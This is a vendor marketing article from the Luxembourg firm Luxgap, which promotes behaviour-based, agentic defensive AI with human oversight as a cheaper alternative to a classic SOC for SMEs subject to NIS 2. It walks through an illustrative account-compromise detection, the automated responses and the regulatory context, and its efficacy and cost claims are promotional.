SMEs under NIS 2: defensive AI more effective and cheaper than a classic SOC

Take a 250-employee SME, subject to NIS 2, with a limited cybersecurity budget. Its information system is the one most companies of that size run: Microsoft 365, Active Directory, a Fortinet or Sophos firewall, a few Windows servers, system logs. No 24/7 SOC, no SIEM at EUR 100,000 a year, no dedicated cybersecurity team.

One morning, an attacker exploits an unknown vulnerability (a 0-day) on the VPN or an exposed web application. Antivirus, EDR and classic signatures detect nothing: there is no signature for an attack nobody has documented yet. This is exactly the scenario traditional security is least equipped for. And it is exactly where defensive AI changes the game.

The problem: classic security looks for the known

Antivirus and EDR are excellent against what is already documented: known malware, listed indicators of compromise (IOCs), published signatures. But they struggle with everything outside that knowledge base:

• 0-days, by definition never seen before;
• bespoke attacks, written for a single target;
• Living off the Land, using only legitimate tools already present (PowerShell, WMI, PsExec, scheduled tasks);
• the diversion of perfectly normal administration tools.

The classic SIEM runs on fixed rules of the type IF event A THEN alert. The result: thousands of alerts, operational fatigue, and the real signal drowned in noise. An SME with no dedicated analyst has no chance of keeping up.

Defensive AI looks at behaviour, not signatures

The approach is radically different. The company deploys a local open-source model (Llama, Mistral or Qwen) on a GPU server, or relies on a sovereign AI hosted in Luxembourg. This AI continuously receives Active Directory, Microsoft 365, firewall and EDR logs, network flows, asset inventory, known vulnerabilities and the mapping of user rights.

It does not look for an attack signature. It builds a behavioural baseline (UEBA) for each user and each machine, then detects statistically significant deviations. This is precisely what our AI-powered log surveillance and analysis module does: reading millions of lines, separating noise from signal, correlating events scattered across AD, EDR, network and cloud to reconstruct a full attack chain.

A concrete case, minute by minute

The account j.dupont@company.com logs in from Luxembourg at 08:17. Nothing unusual.

At 08:23, the same account opens 2,500 files, runs unusual searches and accesses directories never opened before. Antivirus sees nothing. The classic SIEM raises no alert: no rule matches.

At 08:25, the AI reasons differently. This user normally opens around thirty files a day. Today: 2,500 files, access to HR resources and financial folders, at a speed incompatible with human behaviour. Probability of automation: 94%.

At 08:26, the AI observes what follows: creation of an Outlook rule, an automatic external forward, a mass SharePoint download. Taken in isolation, each event looks normal. Their combination is extremely suspicious. It is this contextual reading, not a signature list, that raises the alert.

Agentic AI: it no longer just alerts, it acts

This is where it gets interesting. An agentic AI no longer merely sends an alert nobody reads before Monday. It acts, within predefined rights. For example, above a 90% confidence level:

• MFA token reset;
• temporary account suspension;
• VPN session blocking;
• host isolation via Defender;
• automatic incident ticket creation.

Reaction time: under 30 seconds, where human handling would take hours. The most sensitive actions remain bounded by strict thresholds and human oversight, and every decision is logged, because an autonomous defence must also be auditable. Coupled with our 24/7 managed SOC, the AI handles the first reflex; the analyst takes over qualification and remediation.

Fewer false positives, less fatigue

The strength of reasoning is context. The same action can be perfectly normal or critical depending on who performs it, when, and after what:

• A mass download by HR at month-end: a classic SIEM alerts, the AI understands it is normal.
• A mass download by an accountant right after a phishing email: the AI flags it critical, like the SIEM, but explains why.
• An administrator running PowerShell: normal for the AI, a useless alert for the SIEM.
• An accountant running encoded PowerShell: critical, immediately.

The AI combines the usual user, business context, behavioural history, network topology, privilege level and knowledge of attack techniques to produce a probability, not yet another binary alert. The CISO receives the essentials, not a flood of logs.

Detecting the unknown: 0-day and Living off the Land

This is probably the biggest advantage. Faced with an attack it has never seen, the AI can conclude:

I have never observed this attack, but its behaviour resembles a compromise.

Behavioural analysis catches campaigns that use only legitimate Windows tools, or techniques not yet publicly documented, where signature-based defence stays blind until the IOC is published. In a world of 0-days and automated attacks, waiting for the signature means waiting until you have already been hit.

Compensating for a limited budget

This is the heart of the matter. A complete traditional SOC assumes a SIEM, a SOAR, threat intelligence, N1, N2 and N3 analysts and 24/7 on-call. The real cost sits between EUR 150,000 and 500,000 a year, out of reach for a 250-person SME.

An on-premise defensive AI covers continuous monitoring, event correlation, alert qualification, automatic actions and incident reports with a GPU server (in the order of EUR 20,000 to 40,000 of investment), a few connectors and one engineer for governance. As a managed service, for an SME of this size, that means a few thousand euros a month, a fraction of an internal SOC, for superior coverage on unknown attacks. Cheaper, and more effective precisely where classic security is blind.

A strategic advantage, not just a saving

The attacker already uses AI: flawlessly written phishing, automatic vulnerability discovery, malware generation, full attack automation. Tomorrow, the most effective defence will no longer be more rules, but an autonomous defensive AI able to reason faster than the attacker.

The model shifts: the company no longer tries to prevent every vulnerability, which is impossible, but to have an AI able to observe, understand and react in real time to behaviours never seen before.

What about compliance? NIS 2 and DORA point this way

This vision aligns very well with the early-detection, continuous-monitoring and incident-response requirements set out by NIS 2 (Directive (EU) 2022/2555, Article 21 on risk-management measures, Article 23 on incident notification to the ILR within 24h). For the financial sector only, DORA (Regulation (EU) 2022/2554) imposes the same ICT operational resilience logic. AI does not replace mandatory security measures: it becomes a powerful resilience layer when integrated into a defence-in-depth architecture. And because logs contain sensitive data, hosting stays in Luxembourg, data does not leave the territory (GDPR, banking secrecy), and a fully on-premise option exists.

How Luxgap delivers it

Luxgap brings lawyers, cyber engineers and developers together in the same team, and operates a sovereign AI in Luxembourg. Concretely, for an SME subject to NIS 2:

• our AI log surveillance and analysis module ingests your sources (AD, M365, firewall, EDR, cloud), builds the behavioural baseline and qualifies incidents;
• it feeds our 24/7 managed SOC and pre-fills NIS 2 and DORA notification forms;
• the AI can run on EU sovereign cloud or fully on-premise at your site, depending on your sensitivity level.

Are you an executive, CIO or CISO of an organisation subject to NIS 2 whose budget does not allow a classic SOC? That is exactly the case we handle. Let's talk, or configure a tailored quote in a few minutes.

See also: AI cyber monitoring and log analysis · 24/7 managed SOC · Luxgap sovereign AI · Understanding NIS 2